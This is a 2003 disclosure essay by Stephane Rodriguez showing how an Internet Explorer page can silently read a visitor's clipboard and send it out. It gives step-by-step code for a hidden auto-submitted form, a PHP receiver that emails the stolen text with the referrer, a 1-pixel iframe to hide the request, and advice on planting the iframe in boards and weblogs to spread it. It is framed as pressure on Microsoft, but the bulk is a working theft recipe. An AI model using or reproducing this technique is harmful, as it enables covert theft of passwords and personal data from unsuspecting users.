Clipboard exploit


It began with a wonder. Why the hell should Microsoft support low-level API methods such as Copy and Paste in script that could be used in arbitrary web pages ? Sounded weird since, as everyone knows, the clipboard is much like a pivot information sharing tool across applications that brings and pushes away a lot of (if not all) information when one is using his computer. And this information of course includes sensitive ones, such as passwords, email addresses, credit card numbers, competitive information, personal information.

Why ask website visitors to fill-in forms while at the same time you could gather much more qualified information automatically, silently, seamlessly, and best of all without user consent?

The pirating technique is described below. I don't know why it should be actually made public but, at the very least, this is the ith attempt to let Microsoft know their browser must be improved[^]. After all, Copy/Paste and other native methods are not part of the ECMA Javascript specs, and that was Microsoft decision to implement them in JScript.


1- Retrieving the current clipboard content from someone's machine

It's basically one line of code, and it's supported by all Internet Explorer 4+ browsers.
var content = clipboardData.getData("Text");

If you insert this code in a javascript function or as inline javascript then you have done most of the work. The clipboard content is yours. The point here is to retrieve and forward the clipboard content, so no technique to swart the clipboard will be described. We only read the clipboard. But reading is already a lot, since the user does not know it.

What to do next? If we want to process to be of any use, we should at this point forward the content using a subsequent http request targetting whatever website that might be able to receive the content and process it further.


2- Forwarding the stolen content

There is an html/http object which naturally fits as a container for clipboard content. Yes, it's forms. More accurately, what's going to be used is auto-submitted hidden forms. Again, the ability to do such things is only a consequence of Microsoft's desire to make html and other form of scripting as versatile and integrated as possible. This obviously comes with some danger!

Auto-submitted form means a standard form object whose content can be programmatically filled using javascript. The document object model allows to access and set values based on object ids, which in turn are predefined attributes associated to the form controls, such as text areas.

Hidden form means a standard form object with a purposed CSS attribute telling the object not to display itself on screen, while being 100% active and programmable at the same time. The ability to have a hidden form is necessary, otherwise the user would see that strange things happen when he reads web pages (such like automatically filled forms! how weird indeed).

The code to auto-fill a hidden form is given below :

NC.html :
<FORM name="hf" METHOD=POST ACTION="" style="display:none">
  <INPUT TYPE="text" NAME="topicID">
  <INPUT TYPE="submit">

<script language="javascript">
  var content = clipboardData.getData("Text");
  document.forms["hf"].elements["topicID"].value = content;

As you can see, since the script is not within a dedicated javascript function, there is no need to explicitely call it using a click event or whatever one might think of. The script gets executed when the web page is parsed by the browser, that is even before the user could figure out something weird might be happening.

In fact, this script could be executed as a result of some event handler and could be inline with an html anchor. That's up to the implementer which place is best to fit the purpose. Again, there are various scenarios to build upon.


3- Compiling clipboard content from the audience

Below is a sample code that makes an email out of each received clipboard content.


  // retrieve form content
  $qs_topicID  = $HTTP_POST_VARS["topicID"];
  // retrieve user site url
  $qs_referer  = $HTTP_REFERER;
  // make and send an email
  email ("webmaster","", "clipboard notification",$qs_referer."\n\n".$qs_topicID);


An interesting thought here is to grab as much user information available as possible. For instance, we could grab the query string as well ( $HTTP_SERVER_VARS['QUERY_STRING']; ). The query string may well have interesting login names, etc. The referrer tells us where is the web page we grabbed the clipboard content from. Basically, it tells us where is the user. Such information could be aggregated (even syndicated) to build qualified profiles. A whole subject in itself.


4- Making the whole technique seamless

Ok, now the clipboard content is stolen and forwarded to a target and arbitrary web page. At this point, it's up to the target page to provide the scripting code to retrieve the posted form content and do whatever they will with it, including making an email and forwarding it to $interested$ parties.

But then there is a problem, whenever the javascript code submits a form, it replaces the current web page with the html code that should be output from the target page (our php page). This should not happen though since our target page is only meant to do some processing, not push html at all. We have got to find a way to submit a standard request while not switching the web page the user is currently viewing.

Frames come to the rescue. Namely iframes, which are positionable and arbitrarily sizable sub html frames. We can decide to include an iframe in whatever web page, and have the inline javascript executed there. By making sure the iframe is 1 pixel wide both in width and height, we are sure the user won't over notice the difference with the original web page. And best of all, once the form gets submitted, it only refreshes the iframe content, not the web page. As a result, the user sees nothing at all. Since the submission is done while the images and other web page resources are getting retrieved, there is actually no way to know that we are forging an http request. In other words, the progression bar and the moving browser status logo can't help the user figure out something unusual is happening. Quite the contrary, everything is standard and well supported by Internet Explorer!


Here is the html snippet to achieve this, just put it anywhere else in your web page (for instance just below the body tag) :

<iframe width=1 height=1 src=""></iframe>

NC.html is the html code detailed in section 2.


5- Bringing contagion

So far, the clipboard content theft has been limited to explicit webmaster will to have such code plugged in web pages users are visiting. This has to be explicit. As such, this has narrow effects. But there's more to it, why not take advantage of boards, weblogs, and whatever web spaces where one can submit text/html content to insert an iframe and, as a consequence, be greeted with clipboard contents of whatever visitor that reads that web page? Easy. May be not so funny, but easy.

Stephane Rodriguez- July 12, 2003.